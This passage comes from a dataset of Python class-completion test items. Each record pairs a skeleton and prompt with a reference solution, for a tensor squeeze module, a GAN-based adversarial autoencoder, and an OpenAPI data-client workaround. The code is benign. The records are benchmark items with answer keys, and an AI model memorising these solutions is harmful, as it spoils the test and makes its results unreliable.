inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SqueezeModule:\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. 
:param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n", "source": "the_stack_v2_python_sparse", "source_path": "ReferentialGym/modules/squeeze_module.py", "source_repo": "mk788/ReferentialGym", "split": "test", "star_events_count": 0} {"blob_id": "e79a3e633f9654584bce9620cfc53c2815f63442", "bodies": ["super().__init__()\nself.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\nself.discriminator = discriminator_cls(latent_dim=latent_dim)\nself._latent_dim = latent_dim", "results_gen = self.generator(x)\nz = torch.randn_like(results_gen['encoded'])\nreturn {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n<|end_body_0|>\n\n<|body_start_1|>\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n<|end_body_1|>\n", "class_docstring": "Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc", "class_name": "AdversarialAutoEncoderPyTorch", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). 
This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n<|end_body_0|>\n\n<|body_start_1|>\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000209", "length_bytes": 4295, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model", "name": "__init__", "signature": "def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator)"}, {"docstring": "Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002209", "prompt": "Implement the Python class `AdversarialAutoEncoderPyTorch` described below.\n\nClass description:\nClass implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). 
This will give a significant boost in inferenc\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\n- def forward(self, x): Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs", "prompted_full_text": "Implement the Python class `AdversarialAutoEncoderPyTorch` described below.\n\nClass description:\nClass implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\n- def forward(self, x): Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\n\n<|skeleton|>\nclass AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). 
This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n<|end_body_0|>\n\n<|body_start_1|>\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n<|end_body_1|>\n", "revision_id": "1078f5030b8aac2bf022daf5fa14d66f74c3c893", "skeleton": "<|skeleton|>\nclass AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). 
This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n", "source": "the_stack_v2_python_sparse", "source_path": "dlutils/models/gans/adversarial_autoencoder/aae.py", "source_repo": "justusschock/dl-utils", "split": "test", "star_events_count": 15} {"blob_id": "aabd6b0aea8fff1be5959ee22c29e20327a1a17d", "bodies": ["local_var_params = locals()\nall_params = ['wid', 'uuid']\nall_params.append('async_req')\nall_params.append('_return_http_data_only')\nall_params.append('_preload_content')\nall_params.append('_request_timeout')\nall_params.append('_accept')\nfor key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\ndel local_var_params['kwargs']\nif 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\nif 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\ncollection_formats = {}\npath_params = {}\nif 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\nif 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\nquery_params = []\nheader_params = {}\nform_params = []\nlocal_var_files = {}\nbody_params = None\nheader_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\nauth_settings = ['apiKey', 'bearer']\nreturn self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)", "local_var_params = locals()\nall_params = ['uuid']\nall_params.append('async_req')\nall_params.append('_return_http_data_only')\nall_params.append('_preload_content')\nall_params.append('_request_timeout')\nall_params.append('_accept')\nfor key, val in six.iteritems(local_var_params['kwargs']):\n if 
key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\ndel local_var_params['kwargs']\nif 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\ncollection_formats = {}\npath_params = {}\nif 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\nquery_params = []\nheader_params = {}\nform_params = []\nlocal_var_files = {}\nbody_params = None\nheader_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\nauth_settings = ['apiKey', 'bearer']\nreturn self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)"], "bodies_text": "<|body_start_0|>\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_0|>\n\n<|body_start_1|>\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in 
six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_1|>\n", "class_docstring": "Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.", "class_name": "CustomDataApi", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". 
This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_0|>\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_0|>\n\n<|body_start_1|>\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', 
self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000210", "length_bytes": 15066, "license_type": "permissive", "methods": [{"docstring": "Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg", "name": "workspace_file_details_with_http_info", "signature": "def workspace_file_details_with_http_info(self, wid, uuid, **kwargs)"}, {"docstring": "Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg", "name": "public_file_details_with_http_info", "signature": "def public_file_details_with_http_info(self, uuid, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002986", "prompt": "Implement the Python class `CustomDataApi` described below.\n\nClass description:\nCustom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\n\nMethod signatures and docstrings:\n- def workspace_file_details_with_http_info(self, wid, uuid, **kwargs): Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\n- def public_file_details_with_http_info(self, uuid, **kwargs): Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg", "prompted_full_text": "Implement the Python class `CustomDataApi` described below.\n\nClass description:\nCustom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\n\nMethod signatures and docstrings:\n- def workspace_file_details_with_http_info(self, wid, uuid, **kwargs): Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\n- def public_file_details_with_http_info(self, uuid, **kwargs): Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\n\n<|skeleton|>\nclass CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) 
that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_0|>\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_0|>\n\n<|body_start_1|>\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n 
header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_1|>\n", "revision_id": "ae6b38baff7c695e2a01bf83d3eff48543bd7f57", "skeleton": "<|skeleton|>\nclass CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_0|>\n\n def public_file_details_with_http_info(self, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original public_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomDataApi:\n \"\"\"Custom DataApi object for some OpenAPI workarounds The code generated by the OpenAPI generator has a particular problem (bug?) that immediately falls back to a json response if the accept header has \"application/json\" even if we want \"application/octet-stream\". 
This is handled by re-writing the workspace_file_details_with_http_info and the public_file_details_with_http_info functions.\"\"\"\n\n def workspace_file_details_with_http_info(self, wid, uuid, **kwargs):\n \"\"\"Copy/paste and workaround the original workspace_file_details_with_http_info Accepts an application/octet-stream according to the _accept kwarg\"\"\"\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), 